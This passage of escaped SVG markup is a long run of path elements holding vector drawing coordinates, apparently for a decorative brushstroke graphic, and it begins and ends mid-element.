d=\"M860.1,36.5a5.77,5.77,0,0,0-2.3,1.2c2.7.4,4,.5,4,.2C857.7,37.1,863.6,37.4,860.1,36.5Z\"></path>\n        <path d=\"M756.2,19.3c-1.5-.1-6.4-.6-2.8.3C752,18.9,759.3,20,756.2,19.3Z\"></path>\n        <path d=\"M842,33.1c5.8,1.3,3.8,1.5,5.8,2.1.2-.2,4.9.8,4,.2-4.6-.6-3-.9-4.5-1.4C844.1,33.5,845.3,33.7,842,33.1Z\"></path>\n        <path d=\"M850.7,35c1.5.3,1.9.5,3.2.8-1.7-.8-.4-.7.5-1C851.1,34.2,850.1,34.4,850.7,35Z\"></path>\n        <path d=\"M1133.4,81.1c-4.5-.8-3.3,0,.3.6Z\"></path>\n        <path d=\"M890,40.4c-2.4-.1,1.4.8,3.5,1.2C894.2,41.3,891.5,40.8,890,40.4Z\"></path>\n        <path d=\"M820.8,29a41.32,41.32,0,0,0-5.2-.8c1.7.3.7.4,2.3.7.1-.1-.4-.4.9-.2S821,29.3,820.8,29Z\"></path>\n        <path d=\"M851.3,34.3c1.7.1.1-1-2.4-1.1C852.2,33.9,846.6,33.5,851.3,34.3Z\"></path>\n        <path d=\"M741.7,15.1c.2.2-.7.1-2-.2.7.3-.9.5,1.4.9C739.4,15.1,745.5,16,741.7,15.1Z\"></path>\n        <path d=\"M912.7,44.2c1.7.2,2-.1.1-.5h-.1c-.4.1-2-.1-1.7.2C911.6,44,912.2,44.1,912.7,44.2Z\"></path>\n        <path d=\"M755.6,15.7c-3.7-.6-3.3-.9-6.5-1.4,3.3.9,1.6,1.2,4.8,1.9C752.3,15.5,755.3,16,755.6,15.7Z\"></path>\n        <path d=\"M862.3,32.9c1.5.6-5.3-.2.4.8C861.7,33.3,865.6,33.6,862.3,32.9Z\"></path>\n        <path d=\"M909.2,40.2a5.13,5.13,0,0,0,2.4,1.1c1.2-.1-.3-.2.8-.4Z\"></path>\n        <path d=\"M855.6,31a5,5,0,0,0-2.3-.8c-.5.1-2,0-2.9.1a28.64,28.64,0,0,1,3.2.6C853.7,30.8,853.8,30.7,855.6,31Z\"></path>\n        <path d=\"M735,11.1c3.4.6,5,.7,5,.4A22,22,0,0,0,735,11.1Z\"></path>\n        <path d=\"M1217.9,88c-.1-.3-.7-.8.7-.7C1214.2,86.6,1215.8,87.4,1217.9,88Z\"></path>\n        <path d=\"M893.1,32.6c-.3-.4.5-.7-2.5-1.2C890.7,31.8,891.4,32.1,893.1,32.6Z\"></path>\n        <path d=\"M885,29.7c.6.6-3.4-.5-5.2-.8-.5.1-2,0-2.9.1,3.2.2,10.4,1.6,12.3,1.5C887.4,30.2,886,29.9,885,29.7Z\"></path>\n        <path d=\"M891.9,29.9c-1-.7-5.4-1.8-.6-1.2-3.1-.7-8.5-1.5-10.7-2.1a.35.35,0,0,0,.1.2c3.1.6,5.9,1.3,7.6,1.8C884.4,28.1,889.4,29.4,891.9,29.9Z\"></path>\n        <path d=\"M860.4,24.6c3.2.7,4.3.2,1.8-.3C861.8,24.5,859.3,24,860.4,24.6Z\"></path>\n        <path d=\"M1216.1,82c.9.7-.5.8,2.6,1.4C1218.6,83,1218.2,82.5,1216.1,82Z\"></path>\n        <path d=\"M872.3,25.2c-1.5-.4,0-.7-3.5-1.2C869,24.3,869,24.7,872.3,25.2Z\"></path>\n        <path d=\"M861.4,22.8c-1.8-.3-3.3-.6-4.3-.8a19.44,19.44,0,0,0,5.5,1.5C861.2,23.1,861.6,23,861.4,22.8Z\"></path>\n        <path d=\"M872.3,23.1c-2.3-.3-3.6-.4-4-.2,1.4.2,2.3.4,3.2.6C870.5,23.1,872.8,23.5,872.3,23.1Z\"></path>\n        <path d=\"M889.7,25.2c-2.6-.4-4.2-.5-6.1-.7,1.6.3,1.1.5,1.3.7,1.4.4,3.9.8,5.4,1.1-.1-.2-.2-.3-.2-.5a27,27,0,0,1-3.1-.5.3.3,0,0,0-.1-.2C888.7,25.6,890.4,25.7,889.7,25.2Z\"></path>\n        <path d=\"M879,23.1a15,15,0,0,1-2.1-.4,4.83,4.83,0,0,0-2.2-.6c-.4.2.9.6,2.2.9C877.8,23.1,878.7,23.3,879,23.1Z\"></path>\n        <path d=\"M883.5,20.2c4.6.8,2.6-.1,2.7-.4C880.8,18.9,885.4,20.1,883.5,20.2Z\"></path>\n        <path d=\"M868.9,15.9c-3.3-.5-6.3-.6-8.4-1.4.5.4-4-.6-2.9,0,4.3.5,8.4,1.6,11.5,1.9C865.9,15.8,870,16.3,868.9,15.9Z\"></path>\n        <path d=\"M887.4,18.3c-.8-.1-2.4.4,1.4.9C886.7,18.6,890.2,19,887.4,18.3Z\"></path>\n        <path d=\"M871.6,15.4a26.52,26.52,0,0,1,5.5,1.3c.3.1.6.1,1,.2-.6-.8,3.8-.5-.7-1.6.2.2,0,.2-.3.3s-.9.1-.3.5C875.3,16,871.3,15.2,871.6,15.4Z\"></path>\n        <path d=\"M911,19c-2.8-.6-4.8-.2-.8.4C909.2,18.9,911.6,19.4,911,19Z\"></path>\n        <path d=\"M900.4,17.1c4.9.8,8.6,1.3,12.4,1.7-3.4-.6-3.3-1-6.5-1.5C910.3,18.6,902,17,900.4,17.1Z\"></path>\n        <path d=\"M1309.9,84.2c.9.5-1.6.1-.7.5,2.4.4,4,.6,5.2.8C1314.5,85.1,1312.9,84.7,1309.9,84.2Z\"></path>\n        <path d=\"M874.8,11.9c.1.2-2.9-.4-3-.3,2.8.4,2.2.6,4.3.9C877.3,12.6,877.2,12.3,874.8,11.9Z\"></path>\n        <path d=\"M895.9,15.7c.3-.3-1.2-.7-4.4-1.2C891.8,14.9,893.2,15.3,895.9,15.7Z\"></path>\n        <path d=\"M885.9,12.9c1.1.4.3.6,3.4,1.1,1.4.1.8-.3.7-.7C886.5,12.7,889.4,13.7,885.9,12.9Z\"></path>\n        <path d=\"M886.6,12.3c-6-1.1-1.2.6,1.2.5C886.6,12.6,886.6,12.4,886.6,12.3Z\"></path>\n        <path d=\"M892.2,11.9c.2.4,2.9.9,4.5,1.4,1.2,0,5.4.3.7-.7C898.2,13.4,894.2,12.3,892.2,11.9Z\"></path>\n        <path d=\"M882.6,7.8c.3-.3,2.9-.3-1.3-.8C883.9,7.6,877.7,7,882.6,7.8Z\"></path>\n        <path d=\"M877.4,5.7a24.14,24.14,0,0,1-2.8-.5,6.24,6.24,0,0,0,2.8.7,44,44,0,0,0,5.5.4C880.1,5.6,879.4,5.9,877.4,5.7Z\"></path>\n        <path d=\"M768.7,106.5a14,14,0,0,0-4.6-1.5C766.1,105.4,766.2,106.4,768.7,106.5Z\"></path>\n        <path d=\"M910.8,116.3a31.2,31.2,0,0,1,5.4,1.2,9.92,9.92,0,0,1-2.5-1.3C910.4,115.7,911.6,116.3,910.8,116.3Z\"></path>\n        <path d=\"M917.6,103.9c1.5.2,5.5,1,5.2.8-4.3-1,1-.7-3.7-1.6,0,.3,1.3,1-1.7.5a5.7,5.7,0,0,0-2.3-.8c-.3.3,2.6,1.1,4.4,1.2C919.9,104.2,918.2,103.9,917.6,103.9Z\"></path>\n        <path d=\"M743,70a10.32,10.32,0,0,1-2.2-.5c-.1-.1.8,0,.9-.1-3.7-.6-1.2.4-.7.6C741.1,69.8,743.7,70.3,743,70Z\"></path>\n        <path d=\"M893.4,89.4c-.5.4-6.9-1.3-7.2-.9C890.1,89.3,896,90.1,893.4,89.4Z\"></path>\n        <path d=\"M823.8,75.1c-.6.5,1.2,1.1-1.5,1,2.1.3,1.5.5,4.3.9C823.9,76.2,830,76.1,823.8,75.1Z\"></path>\n        <path d=\"M903.3,87.9c3.6.5,3.3.2,6.3,1a12.75,12.75,0,0,1,3.9.1,1.68,1.68,0,0,0,1,.2c-1.1-.4-3.6-.8-4.4-1.2,2.3-.2,2-1,5.4-.9-3.4-.7-2,0-4-.3-.1-.1-.2-.2-1.1-.3.6-.2,4.7.5,5,.3-4.4-.8,1-.3-2.4-1-1.6,0-.4.7-3.8.3.2-.2,1.7-.4-1.5-1.1q.45.45-1.8.3c-1.6-.6,2.3-.3-.4-.8-2.6.4-11.5.7-12,1.2,1.5.1,0-.6,3.9.1-1.2.2-.2.3,3.3.8-.2.2-3.5-.4-2.9.1C902,87.1,906.1,88,903.3,87.9Z\"></path>\n        <path d=\"M945.6,93.3c5.7,1.3,5.4,2.2,12.3,3.5-1.5-.5,2.8,0-.3-.6C954.3,96.3,950,93.7,945.6,93.3Z\"></path>\n        <path d=\"M928.2,89.2c-3.7-.6,2,0-1.2-.5-7.4-.5-1.7,1.7-4.1,1.5,2.1.3,4.5,1.2,6.3,1.2C922.7,90,925.6,89.1,928.2,89.2Z\"></path>\n        <path d=\"M1057,110.4a8.82,8.82,0,0,1,2.9,0c0,.3-1.8,0,1.3.7,2.2.1-1.5-.9-3.5-1.4C1059.2,110.4,1053.9,109.7,1057,110.4Z\"></path>\n        <path d=\"M931.9,88.8c-6.7-1.2-.3.9,1.3.8C930.9,89.2,932.5,89.1,931.9,88.8Z\"></path>\n        <path d=\"M914,85.9c2.5-.6.8-1.8,3.7-2.4-3.2-.3-3.1-.7-4.2-.7,2.2,1.3,1.6,1.7-4.2,1.3,2.7.5,4.1.9,4.4,1.2-1.8-.3-3.3-.5-4.1-.6C909.9,85,911.4,85.4,914,85.9Z\"></path>\n        <path d=\"M1047.5,98.3c-.1.1.3.4-.9.2,0-.3.3-.5,1.8-.4,3.3.5,8.4,1.8,9.6,1.8-4.3-.9-9.4-2.4-4.8-2-3.5-.7-.6.3-4.1-.5.2-.1,1.4,0,.8-.3a19.25,19.25,0,0,0,3.1.5c-1.4-.6,1.5,0,1.9-.1-6.2-1.1-3,.2-10.2-1.1-5.8.1,1.8,3.1-3.2,3.5,1.6.5,2.1.4,3.3.8-3.4-.4,0,.4-1.7.5a16.33,16.33,0,0,1,4.4,1.1,26.85,26.85,0,0,1-4.1-.5c-1.8-.4-.2-.6-2.4-1,.6.3-2.9.1-.7.5a47.56,47.56,0,0,1,7.4,1.3c3-.2.1-1.3-3.1-2.4,0,.1-.8,0-1-.2,2.4.4,1-.2,3,.2s1.7.8,3.5,1.2a18.21,18.21,0,0,1,3.2.5C1049.1,100.1,1053.7,100.2,1047.5,98.3Z\"></path>\n        <path d=\"M797,27.8c-1.8-.1-3.1-.7-5.2-.8,6.4,1.5,1.7,1.5,6.2,2.9-2.5-1.3,4.3-1.5-2.6-3.4a6.52,6.52,0,0,0,1.7-.3c-1.1,0-4.9-1.1-6.2-.9C794.5,26.2,791.2,26.6,797,27.8Z\"></path>\n        <path d=\"M861.8,6.9c5,.9,1.6.4,1.3.7q3.45.6,3.3.9a12.79,12.79,0,0,0-2.9.1c3.6.5,4.4.3,7,.5a35.67,35.67,0,0,1-5.4-1.2c.2-.2,3.1.3,4,.2-2.7-.4-4.5-.8-4.4-1.1C863.3,6.8,861.5,6.6,861.8,6.9Z\"></path>\n        <path d=\"M910.5,13.7c-3.1.2-6.8-.5-13.2-1.3,2.4.8,3.9.6,5.3,1-2.8-.3,1.9.8,2.4,1.1-1,.7-3.4.8,0,2.1-1.9-.2-3.7-.9-4.2-.7,3.7.5,1.1.7,4.4,1.2-1.6-.8-.6-.2,3.1.4-.7-.4-1.8-.9-2.5-1.3,1.2,0,3.9.5,5.1.5-3.2-.6,2.3.2.8-.3-3-.6-2.7-.3-5.2-.8a8.44,8.44,0,0,0-1.2-.4c2.5.3,4.8.7,5,.4a27,27,0,0,1-3.1-.5c1.9.3-2.7-1.4,2.9-.1.1-.2-1.3-.8,1.9-.1C909.1,14,915.8,14.8,910.5,13.7Z\"></path>\n        <path d=\"M922.9,80c.8-.1,2.8.2,1.8-.4C921.5,79,922.3,80,922.9,80Z\"></path>\n        <path d=\"M887.1,73.8c-.1-.2-.2-.3-.2-.5-2.5-.5-2.2-.2-5.2-.7-.3-.3.8-.4-2.3-.8a11.18,11.18,0,0,0,3.5,1.2C883.7,72.8,885.7,73.6,887.1,73.8Z\"></path>\n        <path d=\"M1027,96.2c.8.1,1.5.3,2.3.4,2.9-.2,1.2-.7,3.5-.7C1029.4,95.4,1028.3,96.2,1027,96.2Z\"></path>\n        <path d=\"M1047.2,95.7c-1.7-.1-6.4-.5-3.8.1C1042.6,95.2,1049,96.6,1047.2,95.7Z\"></path>\n        <path d=\"M924.7,75.5c4.7.9,2-.1,6.1.7,2.2.7-.8.4,1.4.9-1-.6,7,.8,5,.3a39,39,0,0,1-6.5-1.4c1.9.1,1.7-.2.7-.5-1.8-.1-1,.7-5-.3C927.2,75.6,923.4,74.9,924.7,75.5Z\"></path>\n        <path d=\"M746.9,45.1a23.56,23.56,0,0,1,4.1.5,12.3,12.3,0,0,0-3.4-1.1C750.8,45.2,743.9,44.7,746.9,45.1Z\"></path>\n        <path d=\"M1022.3,87.9l.3.6a18.2,18.2,0,0,0,3.1.5C1023.4,88.6,1025.6,88.4,1022.3,87.9Z\"></path>\n        <path d=\"M810.2,50a13,13,0,0,1-3.1-.4c1.2.7-1.6-.1-1.9,0,1.11.21,2.21.48,3.3.8-2.6-.5-2.5.1-.7.7-.8-.4.2-.4,3,.2.4.6,1.1.6.4,1,4.3.7,2,1,5.6,1.6-4.1-1.2.1-1.4-8.2-3.2C807.4,50,813.6,50.9,810.2,50Z\"></path>\n        <path d=\"M1046.7,90.4c3.2.4,1.4-.5,3.7-.4,5.9,1.4,7.3,2.7.9,1.9-1-.5,1.3-.1.8-.4-3.7-.5-4.4.6.7,1.4-.5-.9,4.8-.2,7.7-.2-1.2-.2-3-.5-3.2-.6,5.3,1,.3-.3,3.9.1-1.5,0,3.7.9,3.2.6-2.5-.4-2.5-.8-4.4-1.2.9.4-2.1-.1-3-.2.2-.2-1.5-.5-2.3-.7,4,.4,5.5.8,7.1.6-3.4-.6-3.1-.3-5.3-.9,1.4.7-3.5-.3-3.9-.1-.1-.1-.1-.2-.2-.4-1.4-.2-2.8-.5-4.2-.7C1049.9,90.2,1045,89.9,1046.7,90.4Z\"></path>\n        <path d=\"M1055.8,93.2a47.23,47.23,0,0,0,4.9.2C1056.2,92.5,1054.6,92.9,1055.8,93.2Z\"></path>\n        <path d=\"M1202.1,116.5c2.6.5,2.2.2,5.2.8C1207,116.2,1206,116.7,1202.1,116.5Z\"></path>\n        <path d=\"M948.2,74c4.8.6,3.5-.2,2.1-.9-.7-.4-1.5-.7-1-.8-3-.3-1.4.3-.2.8.9.4,1.6.8-.1.7-3.6-.6,2.6,0-2.3-.7C947.5,73.4,945.9,73.6,948.2,74Z\"></path>\n        <path d=\"M901,66.1c1.4.2,2.8.5,4.2.7C906.2,65.9,904.9,66.5,901,66.1Z\"></path>\n        <path d=\"M961.1,74.7c-1.3-.2-5.6.3-1.5.9C957.4,75,961.7,75.2,961.1,74.7Z\"></path>\n        <path d=\"M986.7,77.8c.3.5-6.9,1.1.9,1.9C988.9,79.3,989.9,79.1,986.7,77.8Z\"></path>\n        <path d=\"M817.5,49c-5.5-.9-6-2.7-2.1-2.5.8.6.4.8,1.5,1.3-.1-.2,2.9.4,3,.3-.3-.2-.8-.9-3.5-1.2,3,.3.6-.5,1.7-.5-3.1-.4-5.6-1.3-3.4-1a2.57,2.57,0,0,0,1.1.4c6.4-.1-3.8-3.2,4.5-2.8-1.5-.5-5.1-.7-5.3-1,5.7.4-2.3-2,4.1-1.7-1.08-.15-2.14-.35-3.2-.6,2.8.3,1.6-.9-.6-1.2.9-.3,3.6-.2,8.1.8-4.4-1.2,1.7-.3-.5-1-1.6.3-3-.9-6.5-1.4-.5.5-1.3.6,1.6,1.4-7.5-.1-1.9,2.5-4.3,3.3a32.89,32.89,0,0,1-5.2-.9c2.9.9,4.4,1.8,1.8,1.7,2.9.5,3.2.8,3.4,1.1-1.3-.2-1.5-.4-3.2-.6,0,.2.6.3,1.2.5-1.1-.2-1.3-.3-2.2-.5,1.6.6-2.6.1.3.7a6.05,6.05,0,0,1,1.9,0c-.1.2,1.3.5,1.3.7-4-.8-1.8,0-5.1-.6,3.1.9,3.4,1.1,1.6,1.4a24.16,24.16,0,0,1,4.3.9c-5-1.1-3.9.1-1.6.7-1.4-.2-2.3-.4-3.2-.6,1.2.9.9,1.6-2.1,1.6,4.7.7,3.3,1.3,2.6,1.4-1.3-.3-2.4-.5-3.3-.8,3,.7,2.7,0,.8-.3.9.8-3.3-.1-5-.3a72,72,0,0,0,10.6,2c-.4-.4-2.6-1.7,1.5-.9-3-.4,1.7.5,1.2.5-.6.4.4.5-.6.8a14,14,0,0,1,3.2.8c0-.2,3.4.5,3,.2C815.3,50.2,822.3,50.4,817.5,49Z\"></path>\n        <path d=\"M983.5,77.3c-.2-.4-3.9-1.1-5.6-1.6C975,74.8,979.8,76.8,983.5,77.3Z\"></path>\n        <path d=\"M888.4,59.9c2.4.2,1.7-.3-1.4-1,.6.9,1.9,1.6,0,2,1.4.2,4.1,1.1,4.3.8-3.7-1-.3-1,2.4-1C891.1,60.2,891.4,60.5,888.4,59.9Z\"></path>\n        <path d=\"M1043,84.4c-1.7.2,2.5,1,.6,1.2,6,1,.4-1-1.7-1.6-.4.1-5.1,0-2.8.2C1040.8,84.4,1040.5,84.1,1043,84.4Z\"></path>\n        <path d=\"M789.8,41.4c-6.2-1.1,1.8-.1-3.4-1.1.4.3-1.3,0-1.9,0,5.8,1.2-1.2.9,2.8,1.9C786.8,41.6,787.1,41.2,789.8,41.4Z\"></path>\n        <path d=\"M792,42c.1.4-3.6-.8-3.1-.4,1,.3.4.4,1.4.9,1.4.2,2.8.5,4.2.7C794.1,42.8,795,42.5,792,42Z\"></path>\n        <path d=\"M896.8,59.3c-.4-.3,5.4.5,1.8-.4.5.3-3-.4-3-.2,2.3.5-1.4.3,2.4,1.1.4-.2,1.7.5,3.2.6C902.2,60.2,897.6,59.7,896.8,59.3Z\"></path>\n        <path d=\"M1015.1,78.7c3.3.6,1.9,0,5.1.6,0-.1-.1-.2-.2-.4C1017.3,78.6,1017.2,78.9,1015.1,78.7Z\"></path>\n        <path d=\"M905.3,56.6c-5.8-.8-5.7-.6-10.3-1.4-.1.5,2.2,1-.6.8,7.5,1.4.4,1.3,2.8,1.9,2.6.2,0-.9,4.8-.1,2.6.6-1.7,0,1.3.7-.2-.6,1.4-1-1.9-2,3,.6,2.6.3,5.2.8C906.7,57.1,905.2,56.8,905.3,56.6Z\"></path>\n        <path d=\"M1143,95.6c-.8-1.1-4.4-2.8-.3-2.8-3.8-.5-1.7,0-4.3-.8,1.7,1-8.7.1-3.1,1.7a19.06,19.06,0,0,0-3.1-.4c4.5.7.7.5-.8.3,2,.9-.5,1.3-1,1.9,2.5.3,5.2,1.1,5.3.9-1.5-.3-1.3-.5-2.3-.7,6.5,1.1,4.9.5,9.3,1.2-4.8-.9,1.4-1-3.7-1.7C1139,95,1142.5,95.7,1143,95.6Z\"></path>\n        <path d=\"M792.2,36.3c-2.7,0-.7,1.1,1.9,2-1-.6,1-.4.6-.8C790.2,36.8,796.2,37,792.2,36.3Z\"></path>\n        <path d=\"M902.9,53.5c2.6.5,3.4.8,4.1.6-2.8-.4.7-.5-3.4-1-.9.1,3.3.9.2.5-3.9-1.1-2.7-1.8-1.9-2-6.7-1.4-3.7.6-3.3,1.1l-2.1-.3c.7-.2-1.8-.6-2.4-1,.3-.2,2.1.1,1.8-.3-3.5-.6-1.5.2-2.8.2,1.1.4,3.4.9,3.5,1.2-4.4-.5-.7.6-3.6.5q3.45.6,3.3.9a19.07,19.07,0,0,0-2-.2c0-.2-.9-.4-2.3-.7,1,.6-.2.7-2.7.4,3.6.4.8.5,3.3.9,2.3.2-1.5-1.1,3.9,0-.3.1-1.4,0-.8.3,4.5.8,5.3.8,8.5,1.6.9-.3-3.7-1-3.5-1.4,3.7.7,5.5,1.3,6.2.9-4.2-.7-6.3-1.3-6.6-1.8C905.2,55.2,901.7,53.6,902.9,53.5Z\"></path>\n        <path d=\"M753.8,28.6c3.9.5,2.2.7,5.4,1.1,1.5.1-.7-.9-2.3-.7-.3-.3,4.9.1-.4-.8,1.5.8-1.8.6-4-.2-2.9-.3,2.1,1.4-2.6.6,3.2.8,2.3.9,3.6,1.5C756.8,30.2,750.3,28.4,753.8,28.6Z\"></path>\n        <path d=\"M866.5,46c-1.6,0-6.8-1.1-5.1-.6,5.5,1,2.2,1.3,5.6,1.7C866.2,46.8,865.9,46.4,866.5,46Z\"></path>\n        <path d=\"M752.4,25.5c-4.1-.5-10.9-1.9-13.6-2.1,5.3,1,5.7,1.6,9.9,2.5C746.1,24.9,749.4,25.3,752.4,25.5Z\"></path>\n        <path d=\"M894.3,47.7c-2.1.2,1.6,1.5-1.4,1.2,7,1.2,3.5,1,5.7,1.8,2,.4,2.3.3,4.1.6-.1-.2-.2-.5-.3-.7-4.2-.8-1.7-1.1-1.5-1.1a42.22,42.22,0,0,0,4.3.8c.3-.2-2-.6-1.3-.8-3.5-.7-.6.3-4.1-.5.7-.2-1.6-.6-1.3-.8,5.9.6,5.2-.4,3.3-1.2C894.9,46.2,899.5,49.3,894.3,47.7Z\"></path>\n        <path d=\"M902.5,29.9c-5.4-.8,0,1.3-4.5.8.2-.3-6.3-1.5-5.2-.9,7.9,1,7.5,3,7.5,3.6,2.6.4-.6.8,2.7,1.6-.9,0-3.8-.6-3-.2,3.5.5,3.4,1.3,5.8,2.1-1.3-.2-1.4-.1-3.1-.4.1-.3-.2-.6-3.4-1.1,2.6.8,1,1.3,0,1.7a14.29,14.29,0,0,0-4.5-1.2c3,.6-.1.5.3.7,1.3.2,2.6.4,3.8.6-.5.3-.5.6.8,1-3.3-.6-2.1-.4-5.3-.9.1.3,2,.7,1.4.9-3.9-.7-4.5-.6-3.9-.1,2.5.2,2,.1,6.1.6.5.3,1.7.8.3.7-4.8-1.3-.5.2-5.2-.9a23,23,0,0,1-4.5.8c4,.7.4-.5,5,.4.1.2.2.5.3.7a21,21,0,0,0-4.1-.5c10,1.6,1.9,2.3,9.7,4.2-1.6-.3-2.7-.6-4.3-.9.4.3-1.3,0-1.9,0,1.5.5,3.1.3,4.3.8.4.5-.4.2-2-.2-.6.4,5.1,1.1,4.5,1.4-6.7-1.2.8.7-3.8,0,4.4,1,0,.5.5,1.1,4.5.9-.1-.6,2.9-.1.1.2,1.9.4,2.2.6a62.51,62.51,0,0,0,7.1.7c-6.9-1.1.8-.2-2.4-1.1,1.6.4,2.6.6,3.1.4-2.4-.4-1.3-.5-3.3-.9-.3.2-.1.5-2.9,0-2.2-1.5,2.1-1.5,5.8-2.2,4.1.9-1.5.6.5,1a17,17,0,0,1,3.1.5h0v-.1a.33.33,0,0,1,0-.47h0a.18.18,0,0,0,0-.27h0a6.37,6.37,0,0,0-1.7-.6c-.1.1-.2.2-2-.1-1.4-.6.5-.4-1.4-.9-8.6-1-4.5-2-2.9-2,.9-.3-2.8-.8-2.4-1.1,4,.6,5.5.5,3.8-.1-5.1-1-1.1.5-4.9-.1-.9-.6,3.8,0,.5-.9a29.59,29.59,0,0,0,5.2.8c-3-1.4-.3-1.4-3.2-2.6,2.1.3,1.5.6,4.3.9-2.1-1.9.1-3.1-3.4-5.2,3.8.7.7-.6,4,.1-4.3-1.2,1.9-.8-3-2.2,0,.1-1.3-.1-1.1-.3,2.8.4,2.2.6,4.3.9-.7-.3.9-.5-1.4-.9-.1.1-.2.2-2-.1-.1-.8,2-1,4.3-1.2,1.5.6,1,.6-.7.6,1.9.3,2.3.3,4,.6h.2a.3.3,0,0,1-.2-.1c-3.1-1.5-8.9-2.8-8.5-3.9-4.2-.8-2.4-.1-5.1-.5.2.4,2.9.9,3.5,1.2-4.6,0,.1,2.2.4,3a28.56,28.56,0,0,0-4.3-.9C899,29.1,901.3,29.5,902.5,29.9Z\"></path>\n        <path d=\"M907.2,42c.5-.1-1.5-.8.8-.4,1.1.2,2.6.4,1,.1-1.4-.2-2.8-.5-4.2-.7C906.5,41.4,903.8,41.3,907.2,42Z\"></path>\n        <path d=\"M909.1,48.3c-.8.2-2.1-.5-3.2-.6a5.88,5.88,0,0,1-2-.2c-.1.5,4.1.8,4.4,1.1-3.1-.4-2.9.1-3.7.4C907.7,49.2,909.7,48.6,909.1,48.3Z\"></path>\n        <path d=\"M738.1,23.9c-1.8-.7.8-.5-2.5-1.2C732.6,22.5,739.1,24.3,738.1,23.9Z\"></path>\n        <path d=\"M846.8,41.2c-.8.2,4.8,1.7,4.4,1.2C846.9,41.9,851.1,41.8,846.8,41.2Z\"></path>\n        <path d=\"M839.8,40.7c3.3.6,1.9,0,5.1.6-.6-.3.9-.4-1.3-.8C845.2,41.4,840,40.4,839.8,40.7Z\"></path>\n        <path d=\"M772.5,29.2c-1.9.3,10.2,2,5.3.9C777.6,30.6,774.4,29.5,772.5,29.2Z\"></path>\n        <path d=\"M757.7,26.5c-.3-.2.2-.4-1.3-.7-.7,0-2.7.4-.8.4.1-.4,4.1,1,4.1.6Z\"></path>\n        <path d=\"M763.2,25.9a1.82,1.82,0,0,0-1.1-.2c4.2.8-.1.3.3.7,3.4.4,3.1-.2,8.1.7-2.1-.3-1.5-.6-4.3-.9C766.5,26.4,765.3,26.3,763.2,25.9Z\"></path>\n        <path d=\"M774.2,24.6c-1,.2,2.2.5,2.5.7.2,0,.5-.1.7-.1C776,25,775.1,24.8,774.2,24.6Z\"></path>\n        <path d=\"M776.7,25.3a.37.37,0,0,0-.3.1h.2C776.7,25.4,776.7,25.4,776.7,25.3Z\"></path>\n        <path d=\"M768.8,23.4c-2.8.1-1.2.2-.4,1.2,5.6,1.1,3.4,1,8.8,2.4-2.4-1-2.2-1.3-.9-1.5-2-.4-2.1-.6-4.2-1-.7.3,3.4,1.2-.7.7C768.1,24.1,773.5,24.3,768.8,23.4Z\"></path>\n        <path d=\"M752.7,22.1c-4.3-1.2-3.1-1.9-8.1-2.8C747.3,20.3,748.1,21.1,752.7,22.1Z\"></path>\n        <path d=\"M847.2,35.8c2.5.5,1.3.7,3.4,1.1.7-.4-2.4-1.2,1.5-1C849,35.5,849.5,36.1,847.2,35.8Z\"></path>\n        <path d=\"M744.4,18.9c1.4.2,2.3.4,3.2.6.3-.4-.8-.8-3.5-1.4C745.7,18.7,747.1,19,744.4,18.9Z\"></path>\n        <path d=\"M736.1,17.6a10.11,10.11,0,0,1,3,.3c1,0,.8-.3,1.8-.3a17.84,17.84,0,0,1-3.3-.8c-1.9-.1.6.4,1.3.8C738.3,17.6,732.9,16.9,736.1,17.6Z\"></path>\n        <path d=\"M874.1,39.7c.6-.5-1.7-1.3.4-1.3-2-.1-9.5-1.1-5.8,0C871.1,38.4,872.5,39.3,874.1,39.7Z\"></path>\n        <path d=\"M819.1,29.6c-1-.2-2.1-.3-3.1-.5,1.1.4.6.7,2.4,1.1-.3-.3,1.1-.1.8-.3a10.32,10.32,0,0,1-2.2-.5A12.34,12.34,0,0,0,819.1,29.6Z\"></path>\n        <path d=\"M745.7,17.5c-.4.2,2.1,1.1,3.4,1-1.9-.3-2.5-.6-2.3-.8,1.4.2,2.3.4,3.2.6C749.7,17.8,747.5,17.7,745.7,17.5Z\"></path>\n        <path d=\"M1115.1,77.7a10.78,10.78,0,0,0-1.8-.2c.2,0,.5.1.7.1,3,.6,7.3,1.9,1.6.7.1.4,5,1.1,6.5,1.5-.3-.4-2.6-.9-3.5-1.4C1118.1,78.7,1116.6,78.1,1115.1,77.7Z\"></path>\n        <path d=\"M759.6,18.2c1.6.2,3.9.7,4.1.6-1.9-.3-2.5-.6-2.3-.8-6.8-1.3-6.8-1.5-12.8-2.6-1.4-.2.1.4-1.9.1-1.7-.4,1.5-.5-3.5-1.4,3.4,1.5.5,1.8,3.2,2.8,0-.2,4,.7,5.3,1-.3-.6,4.8,0,.4-1.2,3.8.6,7.8.9,9.5,1.7C760.8,18.3,759.6,18,759.6,18.2Z\"></path>\n        <path d=\"M909.6,43c.9.1,2,.3,3.1.4,2.4.3,4.3.5.8-.2a1.67,1.67,0,0,1-.8.1c-.7-.1-1.3-.4-.3-.4a19.06,19.06,0,0,0-3.1-.4,10.32,10.32,0,0,1,2.2.5C910.2,42.8,909.4,42.8,909.6,43Z\"></path>\n        <path d=\"M849.5,32.8c-.4-.5,4.6.3,5,0-1.6-.5-2.5-.3-3.2-.6-1.1-.7,3.4-.1,1.5-.9a7.46,7.46,0,0,1-2.1-.3C851.5,31.8,848.9,32.2,849.5,32.8Z\"></path>\n        <path d=\"M763.1,17.3c-1.2-.2-1.2-.4-1.2-.5-4.4-.6-3.1-1-6.5-1.5C755.9,15.7,761.8,17.1,763.1,17.3Z\"></path>\n        <path d=\"M737.2,11.7c-1.9-.1-.3.7,1.5,1.1C735.7,11.8,741.3,12.5,737.2,11.7Z\"></path>\n        <path d=\"M740.4,12.3c.6.1,1.2.2,1.1.3,3.5.7.6-.3,4.1.5,1.4.4.5.7,2.5,1.2-1.4-.6,1.5,0,1.9-.1-2.3-.4-.7-.5-1.3-.8a64.57,64.57,0,0,0,7.3,1.2c-2.4-.8.3-1-1.6-1.3-1.7-.1,0,.8-4.9-.1.8,0,1.2-.1.8-.4-3.6-.5-8.2-.8-5.8,0-2.9-.5-2.2-.6-4.2-.7A.3.3,0,0,1,740.4,12.3Z\"></path>\n        <path d=\"M757.6,13.9c-2.3-.1,1.2.9,2.6,1.4C761.8,15.4,758.3,14.4,757.6,13.9Z\"></path>\n        <path d=\"M876.6,33.6c-.5-.1-1.2-.3-1.6-.4a8.65,8.65,0,0,0,1.6.2c2.7.4,4.9.4,3.4-.1-1.1-.1-2.2-.1-3.3-.2-1.4-.1-2.9-.2-4.7-.4,1.2.3,3.2.6,4.6.9.2.2.5.2.7.3S877,33.8,876.6,33.6Z\"></path>\n        <path 